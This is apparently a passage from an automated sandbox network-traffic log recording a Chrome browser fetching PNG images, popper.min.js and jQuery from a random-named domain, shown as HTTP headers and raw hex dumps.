                                          2025-01-12 00:17:05 UTC16384INData Raw: 01 00 00 ff ff 00 01 ff fe 00 01 02 02 00 01 00 ff 00 ff ff 00 00 00 01 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 01 01 ff 00 00 00 01 00 01 01 ff 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 02 00 00 00 01 ff 00 00 01 00 ff 00 fd 02 02 00 00 00 ff 00 ff 01 01 00 00 00 00 00 ff 01 01 00 ff 00 01 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 01 00 00 00 01 00 01 00 00 00 ff 01 fe 00 00 ff 00 00 00 01 00 00 00 ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:06 UTC16384INData Raw: 00 ff fe 00 00 00 fe 00 00 00 00 00 00 ff 01 00 00 ff 01 00 00 00 00 00 00 00 00 00 ff 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 01 01 00 00 00 00 01 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 ff 00 00 00 ff 00 00 00 02 00 01 00 00 00 00 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 ff 00 00 00 00 01 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 ff 00 ff 00 00 ff ff 00 00 01 00 00 00 00 00 00 00 01 01 00 00 00 ff
                                          Data Ascii:
                                          2025-01-12 00:17:06 UTC16384INData Raw: 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 02 00 00 00 00 00 00 00 ff ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 ff 00 00 00 01 00 00 00 00 00 00 00 fd ff 00 00 01 00 ff 00 ff 00 01 00 01 00 00 00 00 00 01 00 ff 01 00 00 00 00 ff 00 00 00 00 00 00 ff 01 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:06 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:06 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 01 01 01
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          69192.168.2.449821122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:05 UTC601OUTGET /imgs/gf.fc8d6758.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: image/png
                                          Content-Length: 40362
                                          Last-Modified: Tue, 01 Oct 2024 15:31:14 GMT
                                          Connection: close
                                          ETag: "66fc15c2-9daa"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 01 90 08 03 00 00 00 89 6b 69 6c 00 00 02 19 50 4c 54 45 00 00 00 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 02 2a 7c 0f 75 62 0d 74 62 0f 75 62 0c 72 61 0f 75 62 0e 75 62 0e 76 63 0f 75 61 0c 69 5a 0e 73 5f 0f 75 62 0e 76 62 0e 75 63 0e 75 62 0f 76 63 0e 74 61 0e 75 63 0c 75 63 0e 70 5e 0e 73 61 0d 72 60 0f 7c 68 0c 5e 4e 0a 4f 42 0f 83 6f 11 91 79 ff ff ff 02 2a 7c 0f 75 62 00 6b 57 00 5e 48 f1 f7 f6 1d 7d 6b ff de 23 00 5a 43 10 77 64 0f 76 63 00 61 4b 00 64 4f 0c 74 61 02 6d 59 04 6f 5b 08 71 5e 00 66 51 00 68 53 0a 73 5f 00 69 54 fa fd fc ee f6 f5 e1 ee ec 5f a3 96 3a 8e 7e 12 79 66 00 55 3e 82 b7 ad 17 78 66 33
                                          Data Ascii: PNGIHDRkilPLTE*|*|*|*|*|*|*|*|*|*|*|*|*|*|ubtbubraububvcuaiZs_ubvbucubvctaucucp^sar`|h^NOBoy*|ubkW^H}k#ZCwdvcaKdOtamYo[q^fQhSs_iT_:~yfU>xf3
                                          2025-01-12 00:17:06 UTC16384INData Raw: b9 24 57 e8 59 1f 7d 0e 6d 1e 42 d6 4e cd 5d 1e 67 3f 37 ac eb 24 65 b1 63 02 d5 3d a7 46 29 48 45 48 9f df e7 17 68 7e 37 00 3d 37 bb d0 69 6d 48 ca bc 5a e0 e0 e0 60 9a d7 55 ef a3 78 5e 2f 6c a9 a3 c5 48 18 1e cb 34 8d 62 66 01 61 51 e8 bd d6 db 9b 88 a5 06 d3 4b 3a b6 24 af f3 c7 36 04 2b c4 7f 9d a1 98 52 19 8b 0d 92 bb 80 01 bb c8 20 4b 92 42 66 51 e9 6b 3e 64 43 b0 1e cb ca bb 14 1b 24 85 c1 54 2c d1 9b 26 7d ab f8 c5 b6 02 c4 d5 a3 cd 47 78 18 f0 93 22 07 fd 94 28 42 fe 57 b9 a6 85 7e e6 b2 a8 9a 42 9c 1e 33 0e 0e e6 f9 88 94 91 16 94 0a b6 09 57 7d 8c 82 2c 03 a9 cc a4 a7 0d af 0b c5 e6 97 6e dd 9b 9c bb 3b 41 ce 26 7a ef cc 27 67 a4 75 6e a7 ea ae 9d e0 73 2a 20 90 24 6d c2 2b f6 23 4d 92 42 40 e3 d5 6a e2 73 af b9 c7 1e 49 ca 3b 93 9c bf d3 7b
                                          Data Ascii: $WY}mBN]g?7$ec=F)HEHh~7=7imHZ`Ux^/lH4bfaQK:$6+R KBfQk>dC$T,&}Gx"(BW~B3W},n;A&z'guns* $m+#MB@jsI;{
                                          2025-01-12 00:17:06 UTC7940INData Raw: f1 ec eb 74 fe 8a 70 b9 39 b0 54 3b 03 55 2b eb 3f 02 58 08 c0 f6 31 56 c8 0c 8b 98 08 0b fe e4 12 e0 45 52 31 b0 64 56 ff 36 b0 94 72 db 18 df cd 42 60 c1 2a fc 5e 1a a7 5f cd f2 33 ac a0 f4 23 a1 f4 ce a0 cf b0 d4 c2 32 53 ac 5d 3b 2b 08 14 78 7a e5 d1 db cb e7 3f dc 79 f7 f1 fd d4 f6 0e f6 d4 94 dc e1 b3 7d ea fd 99 77 77 3e 9c bf fc f6 d1 95 a7 55 94 73 57 99 09 d6 42 65 08 2c 2c bb 3b bd 7f 3c 09 2c 3f ff ce 96 2b d7 91 44 0d 37 91 70 e2 2f 99 5a e8 d4 12 58 24 2b ab c0 92 55 58 5b 01 b0 20 bf 97 03 8a 26 cf b4 40 c3 d7 60 2f 14 99 ac 61 71 27 69 00 8b 7b 87 27 13 91 36 b6 aa e5 79 2c d6 8b 58 5f 2f 26 d6 97 d6 f4 f4 54 32 39 36 13 ee 3e b1 35 dd 96 54 a6 6d e9 d6 99 34 37 8d 4d 26 53 d3 d3 e5 cb 39 61 d2 40 37 30 c1 32 04 16 a8 d0 ca b6 15 ca de 11
                                          Data Ascii: tp9T;U+?X1VER1dV6rB`*^_3#2S];+xz?y}ww>UsWBe,,;<,?+D7p/ZX$+UX[ &@`/aq'i{'6y,X_/&T296>5Tm47M&S9a@702


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          70192.168.2.449822122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:05 UTC607OUTGET /imgs/banner/banner.365.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: image/png
                                          Content-Length: 16171
                                          Last-Modified: Tue, 01 Oct 2024 15:31:18 GMT
                                          Connection: close
                                          ETag: "66fc15c6-3f2b"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 e8 00 00 00 c8 08 03 00 00 00 4c 39 3b 7d 00 00 02 82 50 4c 54 45 00 00 00 16 94 6c f9 dc 1c ff ff ff ff 35 39 fa fe fe f7 fa fa 72 b6 9a d2 e6 de a2 ca ba fa ba 26 fe 9e 2a fe 72 32 fe 56 36 fe 46 36 fb d6 1e ae d2 c2 fb c2 22 fa a6 2a fe 02 02 fa ca 22 fe 86 2e 5c aa 54 da d3 27 35 9f 7c 02 1c d3 c1 de e8 d4 e4 ec 03 29 d6 fe 62 36 4a a7 87 08 31 db fe cc 02 cb e4 ed 1c 96 6c 16 3e dc fb ea 74 f9 fe fa f6 fa f6 c7 cc 2e fa b2 26 1c 21 2a ae c5 37 34 9e 60 fe 7e 32 02 b9 5b 20 98 75 10 39 df de ee e6 92 c2 b2 28 9a 66 dd ed f3 ea f2 ee 36 81 a9 eb d8 22 42 99 9e 10 36 d3 8b ba 44 b5 d8 e6 3a a0 8a 2b 97 83 f5 da 1e 62 ae 92 2f 58 d3 ba da ce d5 ea f1 db ea ef 33 68 c4 46 a4 5c fe f1 a6 27 9a 7b c2
                                          Data Ascii: PNGIHDRL9;}PLTEl59r&*r2V6F6"*".\T'5|)b6J1l>t.&!*74`~2[ u9(f6"B6D:+b/X3hF\'{
                                          2025-01-12 00:17:06 UTC133INData Raw: dc 5c 9d df dd 0d 2b dd ba d2 fb bf ed f9 d5 cd cd e3 af b3 fb 4b d2 aa 06 d0 07 0d fa 16 1a 40 1f 34 e8 1b e8 ff f6 e9 98 00 00 18 06 82 d0 f9 57 dd bd 12 3e e0 01 d1 e1 80 4c 87 79 89 0e fb 44 87 03 44 87 03 32 1d e6 25 3a ec cb 74 98 57 a6 c3 ba 44 87 7d 99 0e f3 ca 74 58 57 a6 c3 ba 4a 75 d8 56 99 0e e3 2a d5 61 5b 55 c9 0e b3 fa 3c 4a ee 75 80 6d 4a ff e7 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: \+K@4W>LyDD2%:tWD}tXWJuV*a[U<JumJIENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          71192.168.2.449825122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:05 UTC355OUTGET /popper.min.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC380INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 21218
                                          Last-Modified: Tue, 26 Dec 2023 13:01:44 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "658aceb8-52e2"
                                          Expires: Sun, 12 Jan 2025 12:17:05 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC16004INData Raw: 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 39 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e
                                          Data Ascii: /* Copyright (C) Federico Zivolo 2019 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&defin
                                          2025-01-12 00:17:06 UTC5214INData Raw: 69 67 68 74 29 29 29 2c 61 65 28 7b 7d 2c 6f 2c 6e 29 7d 7d 3b 72 65 74 75 72 6e 20 6c 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 2d 31 3d 3d 3d 5b 27 6c 65 66 74 27 2c 27 74 6f 70 27 5d 2e 69 6e 64 65 78 4f 66 28 65 29 3f 27 73 65 63 6f 6e 64 61 72 79 27 3a 27 70 72 69 6d 61 72 79 27 3b 66 3d 6c 65 28 7b 7d 2c 66 2c 6d 5b 74 5d 28 65 29 29 7d 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 66 2c 65 7d 2c 70 72 69 6f 72 69 74 79 3a 5b 27 6c 65 66 74 27 2c 27 72 69 67 68 74 27 2c 27 74 6f 70 27 2c 27 62 6f 74 74 6f 6d 27 5d 2c 70 61 64 64 69 6e 67 3a 35 2c 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 3a 27 73 63 72 6f 6c 6c 50 61 72 65 6e 74 27 7d 2c 6b 65 65 70 54 6f 67 65 74 68 65 72 3a 7b 6f 72 64 65
                                          Data Ascii: ight))),ae({},o,n)}};return l.forEach(function(e){var t=-1===['left','top'].indexOf(e)?'secondary':'primary';f=le({},f,m[t](e))}),e.offsets.popper=f,e},priority:['left','right','top','bottom'],padding:5,boundariesElement:'scrollParent'},keepTogether:{orde


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          72192.168.2.449824122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:05 UTC355OUTGET /jquery.min.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC381INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 89475
                                          Last-Modified: Tue, 26 Dec 2023 13:01:43 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "658aceb7-15d83"
                                          Expires: Sun, 12 Jan 2025 12:17:05 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC16003INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                          Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                          2025-01-12 00:17:06 UTC16384INData Raw: 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 26 26 72 5b 32 5d 2c 61 3d 73 26 26 63 2e 63 68 69 6c
                                          Data Ascii: a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1])&&r[2],a=s&&c.chil
                                          2025-01-12 00:17:06 UTC16384INData Raw: 28 6e 29 29 66 6f 72 28 73 20 69 6e 20 69 3d 21 30 2c 6e 29 24 28 65 2c 74 2c 73 2c 6e 5b 73 5d 2c 21 30 2c 6f 2c 61 29 3b 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 69 3d 21 30 2c 6d 28 72 29 7c 7c 28 61 3d 21 30 29 2c 6c 26 26 28 61 3f 28 74 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 6e 75 6c 6c 29 3a 28 6c 3d 74 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c 28 53 28 65 29 2c 6e 29 7d 29 29 2c 74 29 29 66 6f 72 28 3b 73 3c 75 3b 73 2b 2b 29 74 28 65 5b 73 5d 2c 6e 2c 61 3f 72 3a 72 2e 63 61 6c 6c 28 65 5b 73 5d 2c 73 2c 74 28 65 5b 73 5d 2c 6e 29 29 29 3b 72 65 74 75 72 6e 20 69 3f 65 3a 6c 3f 74 2e 63 61 6c 6c 28 65 29 3a 75 3f 74 28 65 5b 30 5d 2c 6e 29 3a 6f 7d 2c 5f 3d 2f 5e 2d 6d 73
                                          Data Ascii: (n))for(s in i=!0,n)$(e,t,s,n[s],!0,o,a);else if(void 0!==r&&(i=!0,m(r)||(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(S(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},_=/^-ms
                                          2025-01-12 00:17:06 UTC16384INData Raw: 28 72 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 6e 26 26 69 65 28 72 29 26 26 79 65 28 76 65 28 72 2c 22 73 63 72 69 70 74 22 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 72 29 29 3b 72 65 74 75 72 6e 20 65 7d 53 2e 65 78 74 65 6e 64 28 7b 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 2c 63 3d 65 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 2c 66 3d 69 65 28 65 29 3b 69 66 28 21 28 79 2e 6e 6f 43 6c 6f 6e 65 43 68 65 63 6b 65 64 7c 7c 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 31 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c
                                          Data Ascii: (r)),r.parentNode&&(n&&ie(r)&&ye(ve(r,"script")),r.parentNode.removeChild(r));return e}S.extend({htmlPrefilter:function(e){return e},clone:function(e,t,n){var r,i,o,a,s,u,l,c=e.cloneNode(!0),f=ie(e);if(!(y.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||
                                          2025-01-12 00:17:06 UTC16384INData Raw: 61 70 70 65 6e 64 43 68 69 6c 64 28 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 70 74 69 6f 6e 22 29 29 2c 72 74 2e 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 2c 79 2e 63 68 65 63 6b 4f 6e 3d 22 22 21 3d 3d 72 74 2e 76 61 6c 75 65 2c 79 2e 6f 70 74 53 65 6c 65 63 74 65 64 3d 69 74 2e 73 65 6c 65 63 74 65 64 2c 28 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 76 61 6c 75 65 3d 22 74 22 2c 72 74 2e 74 79 70 65 3d 22 72 61 64 69 6f 22 2c 79 2e 72 61 64 69 6f 56 61 6c 75 65 3d 22 74 22 3d 3d 3d 72 74 2e 76 61 6c 75 65 3b 76 61 72 20 70 74 2c 64 74 3d 53 2e 65 78 70 72 2e 61 74 74 72 48 61 6e 64 6c 65 3b 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74
                                          Data Ascii: appendChild(E.createElement("option")),rt.type="checkbox",y.checkOn=""!==rt.value,y.optSelected=it.selected,(rt=E.createElement("input")).value="t",rt.type="radio",y.radioValue="t"===rt.value;var pt,dt=S.expr.attrHandle;S.fn.extend({attr:function(e,t){ret
